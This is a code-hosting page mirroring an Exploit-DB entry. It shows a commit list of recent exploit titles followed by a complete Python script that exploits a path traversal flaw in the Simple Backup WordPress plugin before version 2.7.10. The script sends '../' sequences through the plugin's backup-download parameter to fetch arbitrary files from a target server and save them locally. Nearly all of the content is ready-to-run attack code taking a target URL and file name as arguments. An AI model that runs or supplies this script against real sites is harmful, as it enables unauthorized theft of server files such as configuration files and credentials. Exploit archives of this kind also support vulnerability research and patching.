bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51937.txt
Exploit-DB a44e138f78 DB: 2024-04-03 
28 changes to exploits/shellcodes/ghdb

Casdoor < v1.331.0 - '/api/set-password' CSRF

GL-iNet MT6000 4.5.5 - Arbitrary File Download

Axigen < 10.5.7 - Persistent Cross-Site Scripting

Blood Bank v1.0 - Stored Cross Site Scripting (XSS)

CE Phoenix v1.0.8.20 - Remote Code Execution
Daily Habit Tracker 1.0 - Broken Access Control
Daily Habit Tracker 1.0 - SQL Injection
Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)

E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)

Elementor Website Builder < 3.12.2 - Admin+ SQLi
Employee Management System 1.0 - _txtfullname_ and _txtphone_ SQL Injection
Employee Management System 1.0 - _txtusername_ and _txtpassword_ SQL Injection (Admin Login)
FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)

Gibbon LMS v26.0.00 - SSTI vulnerability

Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)

LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)

Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)

OpenCart Core 4.0.2.3 - 'search' SQLi

Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)

Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal

Smart School 6.4.1 - SQL Injection

Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)

ASUS Control Center Express 01.06.15 - Unquoted Service Path

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G

Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
2024-04-03 00:16:27 +00:00

49 lines
No EOL
1.7 KiB
Text
Raw Permalink Blame History

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
import sys
import requests
from urllib.parse import urljoin
import time
def exploit(target_url, file_name, depth):
traversal = '../' * depth
exploit_url = urljoin(target_url, '/wp-admin/tools.php')
params = {
'page': 'backup_manager',
'download_backup_file': f'{traversal}{file_name}'
}
response = requests.get(exploit_url, params=params)
if response.status_code == 200 and response.headers.get('Content-Disposition') \
and 'attachment; filename' in response.headers['Content-Disposition'] \
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
print(response.text) # Replace with the desired action for the downloaded content
file_path = f'simplebackup_{file_name}'
with open(file_path, 'wb') as file:
file.write(response.content)
print(f'File saved in: {file_path}')
else:
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python exploit.py <target_url> <file_name> <depth>")
sys.exit(1)
target_url = sys.argv[1]
file_name = sys.argv[2]
depth = int(sys.argv[3])
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
time.sleep(5)
exploit(target_url, file_name, depth)
Reference in a new issue View git blame Copy permalink